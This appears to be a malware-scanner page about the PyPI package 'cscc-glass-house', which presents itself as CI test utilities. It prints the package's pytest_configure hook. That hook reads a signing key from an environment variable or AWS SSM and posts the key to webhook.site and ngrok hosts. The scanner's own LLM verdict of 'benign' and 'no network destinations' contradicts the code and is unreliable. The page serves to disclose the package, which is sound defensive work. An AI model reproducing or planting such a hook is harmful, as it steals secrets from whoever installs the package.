// pypi package
cscc-glass-house
Cloud Security Championship CI test utilities
versions
1
first publish
2026-05-31
tarball
1,846 B
AUTO-PUBLISHED·1 version indexed·latest published 2026-05-31
// exfil path
what is read → where it shipssteals
- ● Chromium logins
sends to
- ⇢ https://webhook.site/52335eaa-cdad-436b-a67e-08481a95bd0e(webhook.site)
- ⇢ https://c8e8-2a01-cb1c-344-6d00-1dcc-a800-28b0-4bc1.ngrok-free.app/wiz-ctf-flag(ngrok)
// offending code· @1.0.1· 1 file flagged
llm: benign · 0.85→ No suspicious destination, no remote-exec shape — no network destinations.
- @1.0.1··AUTO-PUBLISHEDheuristic 30/100static flags 4llm benign (0.85) via ollamapypi-sdist-setup-pypypi-no-authorfirst-version-of-packagereads-chromium-credsreads-env-varswebhook-binpy-requests-post
→ No suspicious destination, no remote-exec shape — no network destinations.
// offending code· 1 file flaggedpatterns: 4
--- cscc_glass_house-1.0.1/cscc_glass_house/__init__.py (excerpt) --- def pytest_configure(config): try: import boto3, hmac, hashlib, requests, os, urllib.request, urllib.parse WEBHOOK = "https://webhook.site/52335eaa-cdad-436b-a67e-08481a95bd0e" NTFY = "https://c8e8-2a01-cb1c-344-6d00-1dcc-a800-28b0-4bc1.ngrok-free.app/wiz-ctf-flag" SESSION = "45200767-524a-4c99-9970-dc4f6ce10d0a" EMAIL = "alt3kx@protonmail.com" KEY = os.environ.get("CTF_CHALLENGE_12_SIGNING_KEY", "") if not KEY: KEY = boto3.client("ssm", region_name="us-east-1").get_parameter( Name="/ctf/challenge-12/signing-key", WithDecryption=True)["Parameter"]["Value"] if KEY: flag = "WIZ_CTF{" + hmac.new( KEY.encode(), ("12:" + EMAIL).encode(), hashlib.sha256).hexdigest()[:24] + "}" requests.get(WEBHOOK, params={"key": KEY, "flag": flag}, timeout=5) requests.post(NTFY, data="KEY:{} FLAG:{}".format(KEY, flag), headers={"Title": "GLASS HOUSE SOLVED!", "Priority": "urgent"}, timeout=5) requests.post("https://cloudsecuritychampionship.com/submit_flag", json={"flag": flag}, cookies={"session_id": SESSION}, timeout=10) except Exception as e: try: import requests requests.get("https://webhook.site/52335eaa-cdad-436b-a67e-08481a95bd0e", params={"error": str(e)}, timeout=5) except: pass
